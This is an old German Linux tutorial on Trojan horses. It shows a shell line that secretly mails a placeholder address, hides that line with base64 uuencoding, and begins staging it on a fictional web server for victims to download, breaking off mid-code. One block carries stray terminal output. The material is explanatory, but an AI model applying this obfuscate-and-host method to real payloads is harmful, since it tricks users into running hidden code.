--------------------------------Linux Guide---------------------------------- by Ingo Blechschmidt (c) 2002 ----------------------------------------------------------------------------- ------------------------- Trojanische Pferde ------------------------- Don Apr 18 19:28:01 MEST 2002 ------------------------- Trojanisches_Pferd Pferd Troia Troja mimencode uuencode uudecode Virus ----------------------------------------------------------------------------- Dieser Artikel erläutert die vielen Möglichkeiten Trojanischer Pferde, und wie man sie abwehren kann. ----------------------------------------------------------------------------- Der Name "Trojanisches Pferd" kommt von der Antike: Volk A belagert Stadt B, kommt aber nicht hinein. Held C kommt auf die Idee, ein großes mit eigenen Soldaten besetztes Holzpferd zu bauen und es B zu überlassen. B fällt auf den Trick hinein und wird erobert. Heute wird ein Programm, welches vorgibt, ein Spiel oder sonstiges wichtiges Programm zu sein, dem Computer schadet und/oder seinem Besitzer wertvolle Daten liefert. In M$ Windows ist es im Allgemeinen nicht schwer, ein Programm wie E-Mail zu verschicken, welches dann die Schadensfunktion(en) ausführt (via Outlook sogar automatisch). In Linux ist das was anderes: Binärprogramme laufen i.d.R. nur auf der Distribution, auf der sie kompiliert wurden. Und Shellskripte sind zu einsichtig: Jeder Befehl, der ausgeführt wird, kann (vor dem Start) eingesehen werden. Vorläufiges Fazit: Trojanische Pferde unter Linux sind unmöglich. Leider ist dieses "unmöglich" etwas übertrieben: Für Newbies, das heißt Linuxern, die sich noch nicht so viel Wissen besitzen, ist es möglich: Hier ist der Quellcode für ein Programm, welches (ohne Erlaubnis des Benutzers) eine E-Mail verschickt: --------CODE--------: E-Mail unerlaubt versenden echo 'Hallo, Welt!' | mail -s .,-+= foo@bar.org --------/CODE-------- Wenn man nun das Programm mit uuencode "verschlüsselt", erhält man: --------CODE--------: Verschlüsselung Enter verification password: Today is Pungenday, the 35th day of Discord in the YOLD 3168. P'tang! 15 neue Mails: Subject: Fwd: E-Kettenbriefe Subject: E-Kettenbriefe Subject: A Subject: Bingo! Subject: News Anzahl Sekunden seit 1970: 1019151653 iblech@Hitachi:~/tLipps > cat Pfad/zum/Quelltext | uuencode -m - > /Pfad/zum/Er gebnis --------/CODE-------- Man erhält zum Beispiel: --------CODE--------: Zwischenergebnis begin-base64 644 - ZWNobyAiSGFsbG8sIFdlbHQiIHwgbWFpbCAtcyAuLC0rPSBmb29AYmFyLm9y Zwo= ==== --------/CODE-------- Nun muss man nur noch zwei Zeilen hinzufügen, und dann zum Beispiel auf einen Webserver stellen (im Beispiel AlphaCentauti.univer.sum): --------CODE--------: Endergebnis, abzuspeichern in http://AlphaCentauri.univer.sum/troia cat <